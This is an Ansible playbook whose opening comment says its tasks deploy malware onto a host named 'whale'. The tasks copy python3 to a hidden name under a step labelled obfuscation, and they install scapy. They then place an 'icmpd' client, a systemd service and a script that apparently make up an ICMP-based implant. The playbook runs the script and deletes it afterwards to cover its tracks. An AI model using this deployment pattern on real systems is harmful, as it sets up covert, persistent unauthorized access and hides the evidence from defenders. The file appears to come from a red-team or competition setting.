---
# This is an example task
# add your tasks to deploy your malware here


- name: Obsfucate | Run | Run on Linux 
  shell: "cp /usr/bin/python3 /usr/bin/secret"
  when: inventory_hostname_short == "whale"

- name: PipRaspDownload | Run | Run on Linux 
  shell: "python3 -m ensurepip --upgrade"
  when: inventory_hostname_short == "whale"

- name: ScapyDownload | Run | Run on Linux 
  shell: "pip3 install scapy"
  when: inventory_hostname_short == "whale"

- name: icupClientDeploy | Copy file | Adds icup client
  copy:
    src: "files/icmpd.py"
    dest: "{{ icuplocation }}"
    mode: 0555
  when: inventory_hostname_short == "whale"

- name: icupServiceDeploy | Copy file | Adds icup service
  copy:
    src: "files/icmpd.service"
    dest: "{{ servicelocation }}"
    mode: 0555
  when: inventory_hostname_short == "whale"

- name: icupScriptDeploy | Copy file | Adds icup script
  copy:
    src: "files/icmpd.sh"
    dest: "{{ scriptlocation }}"
    mode: 0555
  when: inventory_hostname_short == "whale"

- name: CarriageReturnFix | Run | Run on Linux 
  shell: "sed -i -e 's/\r$//' /etc/icmpd"
  when: inventory_hostname_short == "whale"

- name: RunScript | Run | Run on Linux 
  shell: bash "/home/icmpd.sh"
  when: inventory_hostname_short == "whale"

- name: DeleteScript | Run | Run on Linux 
  shell: "rm /home/icmpd.sh"
  when: inventory_hostname_short == "whale"
